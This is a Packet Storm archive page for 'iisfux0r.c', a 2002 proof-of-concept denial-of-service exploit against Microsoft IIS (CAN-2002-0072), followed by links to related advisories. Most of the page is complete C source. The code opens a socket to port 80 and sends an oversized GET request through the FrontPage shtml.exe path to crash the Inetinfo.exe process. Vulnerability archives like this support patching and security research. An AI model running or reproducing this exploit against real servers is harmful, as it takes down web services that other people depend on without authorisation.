Lucene search
Filip MaertensPACKETSTORM:25968HistoryApr 23, 2002 - 12:00 a.m.
iisfux0r.txt
2002-04-2300:00:00
Filip Maertens
packetstormsecurity.com
36
0.107 Low
EPSS
Percentile
94.5%
`/* iisfux0r.c - Microsoft IIS W3SVC Denial of Service, (c) Filip Maertens - PoC
BUG-ID : 2002009
CVE : CAN-2002-0072
Advisory : Peter Grundle @ KPMG
Dave Aitel @ AtStake
** This will bring down the Inetinfo.exe process, in which you create a Denial of Service
condition on your webserver. Please, confirm with management prior to executing this
proof of concept code. The author of this code, nor Peter Grundle and Dave Aitel can
be helt responsible for disclosing this vulnerability.
** Example usage: RH-BOX# iisfux0r localhost /
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#define DENIALSIZE 40 * 1024
#define URLSEQUENCE "_vti_bin/shtml.exe/"
int main(int argc, char *argv[])
{
struct sockaddr_in sin;
char denialchar[DENIALSIZE + 100];
int i, create_socket;
printf("iisfux0r | Microsoft IIS W3SVC/FP2002 Denial of Service | <[email protected]>\n----------------------------------------------------------------------------\n");
if (argc < 3)
{
printf(" -- Usage: iisfux0r [ip] [directory]\n");
exit(0);
}
// Create the sockets
if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 )
printf(" -- Socket created.\n");
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
sin.sin_addr.s_addr = inet_addr(argv[1]);
if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0)
printf(" -- Connection made.\n");
else
{ printf(" -- No connection.\n"); exit(1); }
// Create the Denial of Service payload
printf(" -- Crafting payload.\n");
strcat(denialchar, "GET ");
strcat(denialchar, argv[2]);
strcat(denialchar, URLSEQUENCE);
for(i=0; i < DENIALSIZE; i++)
{
strcat(denialchar, "x");
}
strcat(denialchar, ".html");
strcat(denialchar, " HTTP/1.0\n\n");
send(create_socket, denialchar, sizeof(denialchar), 0);
close(create_socket);
}
// EOF - More exploits @ http://filip.compsec.be
`
Related
securityvulns
securityvulns
KPMG-2002009: Microsoft IIS W3SVC Denial of Service
2002-04-11 00:00:00
Advisory CA-2002-09 Multiple Vulnerabilities in Microsoft IIS
2002-04-12 00:00:00
Multiple Remote Vulnerabilities in Microsoft IIS
2002-04-11 00:00:00
cert
cert
checkpoint_advisories
checkpoint_advisories
Microsoft IIS URL Access Violation DoS - Ver2 (CVE-2002-0072)
2014-12-28 00:00:00
cve
cve
CVE-2002-0072
2002-04-22 04:00:00
nessus
nessus
Microsoft IIS Multiple Remote DoS (MS02-018 / Q319733)
2002-04-11 00:00:00
cisco
cisco
Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
2002-04-15 18:00:00